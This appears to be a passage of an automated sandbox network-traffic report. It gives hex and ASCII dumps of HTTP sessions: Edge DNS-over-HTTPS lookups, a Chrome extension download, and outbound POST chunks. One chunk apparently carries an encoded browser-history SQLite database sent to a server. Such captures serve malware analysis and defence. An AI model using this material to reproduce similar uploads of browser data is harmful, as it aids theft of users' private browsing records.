                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:40 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                36192.168.2.649878162.159.61.34432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:39 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8f4d97386aff5e74-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                37192.168.2.649880162.159.61.34432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:39 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8f4d9738690142e9-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fe 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                38192.168.2.649879172.64.41.34432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:39 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8f4d97386c3b4405-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ef 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                39192.168.2.649870142.250.181.654432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:39 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC6ap6mNg0Hrw4MtMT8Ug49sMHZd2KZOx4D3WSOxG8DdznHqccDZ3EzB8t1i9o_OOP9MacNJios
                                                                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                                                                Date: Thu, 19 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                Expires: Fri, 19 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                Age: 52405
                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                                                                                                                                                Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                                                                                                                                                Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                                                                                                                                                Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                                                                                                                                                Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
